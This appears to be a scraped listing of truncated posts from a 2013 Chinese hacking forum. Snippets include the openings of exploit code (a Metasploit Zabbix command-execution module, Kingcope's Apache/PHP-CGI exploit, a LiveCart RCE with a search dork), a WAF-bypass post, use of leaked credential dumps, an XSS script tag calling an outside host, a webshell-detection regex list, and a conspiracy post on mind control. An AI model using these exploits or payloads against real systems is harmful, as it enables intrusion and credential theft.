Kevin2600 (Just Hacking it!!!) | 2013-11-12 16:31 玩了下这套出自三星电子的RFID 门禁...用的是UID 识别...所以呵呵了... [原文地址] 留言评论（旧系统）： wormfox @ 2013-11-13 15:36:51 Res

本文内容仅供研究，请勿用于非法用途！！！ 很久很久以前，我在管理服务器的时候总喜欢放个一句话，然后菜刀连之，管理网站又方便又简单。 后来X客、X

usage: golismero.py [-h] [-f FILE] [--config FILE] [-p NAME] [--ui-mode MODE] [-v] [-q] [--color] [--no-color] [--audit-name NAME] [-db DATABASE] [-nd] [-i FILENAME] [-ni] [-o FILENAME] [-no] [--full] [--brief] [--max-connections MAX_CONNECTIONS] [--allow-subdomains] [--forbid-subdomains] [-r DEPTH] [-l MAX_LINKS] [--follow-redirects] [--no-follow-redirects] [--follow-first] [--no-follow-first] [-pu USER] [-pp PASS] [-pa ADDRESS:PORT] [--cookie COOKIE] [--cookie-file FILE] [--persistent-cache] [--volatile-cache] [-a PLUGIN:KEY=VALUE] [-e PLUGIN] [-d PLUGIN] [--max-concurrent N] [--plugins-folder PATH] COMMAND [TARGET [TARGET ...]] available commands: 可用

声明：本人从没搞过这个，只是从可行性上分析，是否真正可行，不知。。。 1.找人搞个淘宝店【反正就是搞个可以开店发布产品的店】 2.店开起来，找几

初探某广告联盟产生的一些猥琐想法 jeary ((:?.kcaH eb nac gnihtynA)) | 2013-11-08 10:58 最近弄了个广告联盟，好像无需备案即可申请。 点击一个广告6分钱，弹窗一个4.5毫（注意不是土豪

斯诺登事件令世界一片哗然，人们都在为美国庞大的信息监控收集网络而感到担忧。 《华盛顿邮报》网站近日刊出了一篇文章，描述了NSA（美国国家安全局

绕过网站安全狗3.1 上传 90_ | 2013-11-07 22:37 首发自 08安全团队（www.08sec.com） 此方法只试用于V3.1 05837 或小于V3.1 05837 最新版本为 V3.1 06103 ps：

zabbix 远程命令执行。 妈妈说再也不担心wb不够了 http://www.wooyun.org/searchbug.php?q=Zabbix+ 刷起来哈哈 # # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'Zabbix Authenticated Remote Command Execution', 'Description' => %q{ ZABBIX allows an administrator to create scripts

大家来猜搜狗那个安全漏洞的形成原因（猜对获得肉肉签名手帕一只） xsser (十根阳具有长短!!) | 2013-11-06 10:59 首先我觉得这个问题应该是真实的，在用户量大的时候

昨天通过社工库搞到一枚草榴账户，然后.... Lenwood (\r) | 2013-11-06 10:07 看到zone里有人发社工库地址（天涯、人人、csdn的裤子） 突然发现游客了几个月还没入

服务器流量异常追踪--抵抗AWVS扫描 xiaoL | 2013-11-06 02:55 上次发帖求教服务器流量异常处理，看了日志之后发现一坨扫描器留下的痕迹。 发现了WVS的扫描记录，

一种结合本地程序的更加猥琐的钓鱼方式（中招率+100%） 我是小号 (我是小学生) | 2013-11-05 18:58 因为现在程序员偷懒，都喜欢把一些实现软件功能的html放

求思路 如何判断一个IP是否在某网段内 whirlwind (别人笑,不去想,我就为你而倔强.除了你,都一样,不能放,害怕丢失唯一的信仰.你在我永远到不了的地方!

/* Apache Magica by Kingcope */ /* gcc apache-magika.c -o apache-magika -lssl */ /* This is a code execution bug in the combination of Apache and PHP. On Debian and Ubuntu the vulnerability is present in the default install of the php5-cgi package. When the php5-cgi package is installed on Debian and Ubuntu or php-cgi is installed manually the php-cgi binary is accessible under /cgi-bin/php5 and /cgi-bin/php. The vulnerability makes

作者：Sms大陆特派猿 (@Specialmb)，原文地址：解密所谓"公益"性漏洞提交网站生存之道 作者：admin 发布于：2013-10-25

用企鹅比较早的同学都知道早在05年到08年左右企鹅有个功能叫“QQ心情”后来改名叫“滔滔”。现在改名叫“说说”。 自从某一版本更新后以前的“Q

西部数码域名安全验证形同虚设，真尼玛方便劫持.... x防部 | 2013-11-02 18:28 前段时间在西部数码注册了6个域名，今天打算全部转走， 之所以把域名转走就是有版

2013年度最下作恶意软件。 Kuuki | 2013-11-03 15:10 简而言之：会撕票的恶意软件。约今年9月出现，10月开始引人关注。 敲诈程序向受害者索要比特币 名叫Crypt

阴谋论：政府通过手机基站的电子精神控制 Hxai11 (http://www.itkuo.cn) | 2013-11-02 20:46 政府用精神控制技术将矛头指向你的这一天终于迫近了，而你的邻居和亲人都会涉入其中。在每一天，这

请问什么叫xss盲打？ khjian | 2013-11-02 13:27 xss小白，老听人讲xss盲打，是什么意思啊？大牛给科普一下呗，谢谢了 [原文地址] 相关内容： 1# 小胖子 (我承认，

adobe 1.5亿泄露数据 密码算法逆向挑战 猪猪侠 (A) | 2013-11-02 20:40 # 楼主想到的逆向方式 算出 top 1000，排行第一的密码会是空密码，或123456，然后再反逆算法

如果我们被运营商卖了。 %50 (x了个o) | 2013-11-02 14:55 有一个笑话： 国家拨一亿给铁道部做网络售票网站，铁道部用其中1千万找一软件公司做，软件公司用其中50

网站密码被星号加密了？教你怎么解。 Black-Hole | 2013-11-02 16:35 这也是只是我在学javascript时，突然想到的，今天试验了下，果然成功了。 这是个测试的：这个事

关于转载问题思考 he1renyagao (<script src=http://xsserme.sinaapp.com/03h4FW?1383289085></script>) | 2013-11-01 14:39 rt 如果在zone的一个话题，评论中插入一个xss，虽然在zone中不会被触发，但如果被某些XX转载之后，会不会在

<?php /********************** 作者 Spider 网上公布的各种PHP后门全军覆没 针对一些特殊变形的后门需要自己添加特征 误报率不到百分之一 **********************/ error_reporting(E_ERROR); ini_set('max_execution_time',20000); ini_set('memory_limit','512M'); header("content-Type: text/html; charset=gb2312"); $matches = array( '/function\_exists\s*\(\s*[\'|\"](popen|exec|proc\_open|system|passthru)+[\'|\"]\s*\)/i', '/(exec|shell\_exec|system|passthru)+\s*\(\s*\$\_(\w+)\[(.*)\]\s*\)/i', '/((udp|tcp)\:\/\/(.*)\;)+/i', '/preg\_replace\s*\((.*)\/e(.*)\,\s*\$\_(.*)\,(.*)\)/i', '/preg\_replace\s*\((.*)\(base64\_decode\(\$/i', '/(eval|assert|include|require|include\_once|require\_once)+\s*\(\s*(base64\_decode|str\_rot13|gz(\w+)|file\_(\w+)\_contents|(.*)php\:\/\/input)+/i', '/(eval|assert|include|require|include\_once|require\_once|array\_map|array\_walk)+\s*\(\s*\$\_(GET|POST|REQUEST|COOKIE|SERVER|SESSION)+\[(.*)\]\s*\)/i', '/eval\s*\(\s*\(\s*\$\$(\w+)/i', '/(include|require|include\_once|require\_once)+\s*\(\s*[\'|\"](\w+)\.(jpg|gif|ico|bmp|png|txt|zip|rar|htm|css|js)+[\'|\"]\s*\)/i', '/\$\_(\w+)(.*)(eval|assert|include|require|include\_once|require\_once)+\s*\(\s*\$(\w+)\s*\)/i', '/\(\s*\$\_FILES\[(.*)\]\[(.*)\]\s*\,\s*\$\_(GET|POST|REQUEST|FILES)+\[(.*)\]\[(.*)\]\s*\)/i',

之前有过讨论（大家有考虑过微信公众平台的注入么），但是情况是我自己模拟出来的，今天终于遇到一个实例。 话不多说，上图。 附送盲打到的后台 [原文地

大家有考虑过微信公众平台的注入么 Valo洛洛 (tomorrow.) | 2013-08-08 19:04 RT [原文地址] 相关讨论： 1# Icyblade | 2013-08-08 19:09 你这个不是微信的问题吧 我手上也有个微信公众平台，工作流

#Title : LiveCart 1.4 Remote Code Execution #Author : DevilScreaM #Date : 10/23/2013 #Category : Web Applications #Type : PHP #Vendor : http://livecart.com #Download : http://livecart.com/download #Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber #Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded | #Vulnerabillity : Remote Code Execution #Dork : intext:Powered by LiveCart & USE YOUR BRAIN Vuln

全民移动免费的时代即将到来 xsser (十根阳具有长短!!) | 2013-10-29 11:41 据说现在易信和来往都对用户免流量了，这意味着有条通道的流量是不计费的，如果能将正常的

jsp能像php asp什么的include后门文件吗？ 不可以吧，jsp只能include jsp文件吧？要不怎么没看见有人说过jsp inclu